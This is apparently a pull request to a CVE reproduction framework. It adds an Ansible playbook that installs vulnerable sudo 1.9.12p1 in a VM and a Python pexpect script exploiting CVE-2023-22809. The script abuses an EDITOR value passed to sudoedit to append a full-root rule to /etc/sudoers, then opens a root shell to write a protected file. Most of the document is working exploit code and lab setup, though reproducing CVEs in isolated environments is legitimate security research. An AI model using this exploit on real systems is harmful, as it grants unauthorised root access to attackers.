### PR TITLE
cvex for cve-2023-22809

### DIFF
--- a/CVE-2023-22809/cvex.yml
+++ b/CVE-2023-22809/cvex.yml
@@ -1,0 +1,5 @@
+blueprint: ubuntu2204
+ubuntu:
+  playbook: ubuntu.yml
+  command:
+  - cat /etc/admin-only

--- a/CVE-2023-22809/cvex.yml
+++ b/CVE-2023-22809/cvex.yml
@@ -2,4 +2,9 @@ blueprint: ubuntu2204
 ubuntu:
   playbook: ubuntu.yml
   command:
-  - cat /etc/admin-only
+  - |
+    su - editonly <<! >/dev/null 2>&1
+    editonly
+    python3 /home/editonly/exploit.py
+    !
+  - sudo cat /etc/sudoers

--- a/CVE-2023-22809/data/exploit.py
+++ b/CVE-2023-22809/data/exploit.py
@@ -3,26 +3,21 @@ import sys
 import time
 
 child = pexpect.spawn("/bin/sh")
-# child.logfile = sys.stdout
 child.sendline('EDITOR="nano -- /etc/sudoers" sudoedit /etc/writable') # the exploit lets you edit sudoers
+time.sleep(1)
 child.sendline('editonly') # password
-time.sleep(0.1)
+time.sleep(1)
 
 # Run for /etc/sudoers and /etc/writable
 for i in range(2):
     child.send("\x1b/") # go to end of file
-    time.sleep(0.1)
+    time.sleep(1)
     child.sendline("\x0deditonly ALL=(ALL:ALL) ALL") # write payload on new line
-    time.sleep(0.1)
+    time.sleep(1)
     child.send("\x0F")  # Control + O to save
-    time.sleep(0.1)
+    time.sleep(1)
     child.send("\x0D")  # Enter to confirm the filename
-    time.sleep(0.1)
+    time.sleep(1)
     child.send("\x18")  # Control + X to exit
-    time.sleep(0.1)
+    time.sleep(1)
 
-# Run a root shell as user editonly and write to a protected file as
-# proof of root permissions
-child.sendline('sudo -s')
-time.sleep(1)
-child.sendline('echo "I shouldn\'t be able to write to this file!" > /etc/admin-only')

--- a/CVE-2023-22809/data/exploit.py
+++ b/CVE-2023-22809/data/exploit.py
@@ -1,0 +1,28 @@
+import pexpect
+import sys
+import time
+
+child = pexpect.spawn("/bin/sh")
+# child.logfile = sys.stdout
+child.sendline('EDITOR="nano -- /etc/sudoers" sudoedit /etc/writable') # the exploit lets you edit sudoers
+child.sendline('editonly') # password
+time.sleep(0.1)
+
+# Run for /etc/sudoers and /etc/writable
+for i in range(2):
+    child.send("\x1b/") # go to end of file
+    time.sleep(0.1)
+    child.sendline("\x0deditonly ALL=(ALL:ALL) ALL") # write payload on new line
+    time.sleep(0.1)
+    child.send("\x0F")  # Control + O to save
+    time.sleep(0.1)
+    child.send("\x0D")  # Enter to confirm the filename
+    time.sleep(0.1)
+    child.send("\x18")  # Control + X to exit
+    time.sleep(0.1)
+
+# Run a root shell as user editonly and write to a protected file as
+# proof of root permissions
+child.sendline('sudo -s')
+time.sleep(1)
+child.sendline('echo "I shouldn\'t be able to write to this file!" > /etc/admin-only')

--- a/CVE-2023-22809/ubuntu.yml
+++ b/CVE-2023-22809/ubuntu.yml
@@ -80,7 +80,3 @@
         path: /etc/sudoers
         line: "{{ test_user }} ALL=(ALL:ALL) sudoedit /etc/writable"
         validate: 'visudo -cf %s'
-
-    - name: Execute exploit script as user editonly
-      shell: "su - {{ test_user }} -c 'python3 /home/{{ test_user }}/exploit.py'"
-

--- a/CVE-2023-22809/ubuntu.yml
+++ b/CVE-2023-22809/ubuntu.yml
@@ -1,0 +1,86 @@
+---
+# security_lab_setup.yml
+# Purpose: Creates isolated environment for studying CVE-2023-22809
+# WARNING: Only for use in authorized educational environments
+# Ensure proper isolation and authorization before use
+
+- name: Setup CVE-2023-22809 Study Environment
+  hosts: all
+  become: yes
+  vars:
+    test_user: editonly
+    test_password: editonly
+    sudo_version: "1.9.12p1"
+    
+  tasks:
+    - name: Create test user with password
+      shell: |
+        useradd -m -s /bin/bash {{ test_user }}
+        echo "{{ test_user }}:{{ test_password }}" | chpasswd
+        
+    - name: Update apt cache
+      apt:
+        update_cache: yes
+        
+    - name: Install required packages
+      apt:
+        name: 
+          - g++
+          - gcc
+          - make
+        state: present
+        install_recommends: no
+      environment:
+        DEBIAN_FRONTEND: noninteractive
+        
+    - name: Copy exploit test script
+      copy:
+        src: ./data/exploit.py
+        dest: "/home/{{ test_user }}/exploit.py"
+        owner: "{{ test_user }}"
+        mode: '0744'
+        
+    - name: Copy sudo source
+      copy:
+        src: "./data/sudo-{{ sudo_version }}.tar.gz"
+        dest: "/root/sudo-{{ sudo_version }}.tar.gz"
+        
+    - name: Extract sudo source
+      unarchive:
+        src: "/root/sudo-{{ sudo_version }}.tar.gz"
+        dest: /root/
+        remote_src: yes
+        
+    - name: Configure sudo
+      command: ./configure
+      args:
+        chdir: "/root/sudo-{{ sudo_version }}"
+        
+    - name: Build sudo
+      command: make
+      args:
+        chdir: "/root/sudo-{{ sudo_version }}"
+        
+    - name: Install sudo
+      command: make install
+      args:
+        chdir: "/root/sudo-{{ sudo_version }}"
+        
+    - name: Refresh shell hash table
+      shell: hash -r
+        
+    - name: Create test file
+      file:
+        path: /etc/writable
+        state: touch
+        mode: '0644'
+        
+    - name: Configure sudoers entry
+      lineinfile:
+        path: /etc/sudoers
+        line: "{{ test_user }} ALL=(ALL:ALL) sudoedit /etc/writable"
+        validate: 'visudo -cf %s'
+
+    - name: Execute exploit script as user editonly
+      shell: "su - {{ test_user }} -c 'python3 /home/{{ test_user }}/exploit.py'"
+


### PR DESCRIPTION
This CVEX submission illustrates CVE 2023-22809, which is a privilege escalation attack in linux using certain old versions of sudo. With these old versions, a regular user whose only special permission is the ability to sudoedit 1 or more privileged files can modify /etc/sudoers and give themselves full permissions :O 

The ansible script makes a user on the VM called editonly which is granted the ability to edit /etc/writable, but is otherwise a normal user. The exploit python script (exploit.py) is run as editonly. To prove that sudo permissions were granted to editonly, exploit.py then makes and writes to a new file called /etc/admin-only, which editonly shouldn't normally have permissions for. Finally, ansible runs cat /etc/admin-only, which outputs the text written by the root shell opened through editonly.

The exploit only seems to work with an interactive editor like vim or nano. Passing commands to these editors via command line didn't work, so the python script actually interacts with nano in the background so that the exploit can still work automatically.

https://www.exploit-db.com/exploits/51217
https://nvd.nist.gov/vuln/detail/CVE-2023-22809
https://github.com/n3m1sys/CVE-2023-22809-sudoedit-privesc/blob/main/exploit.sh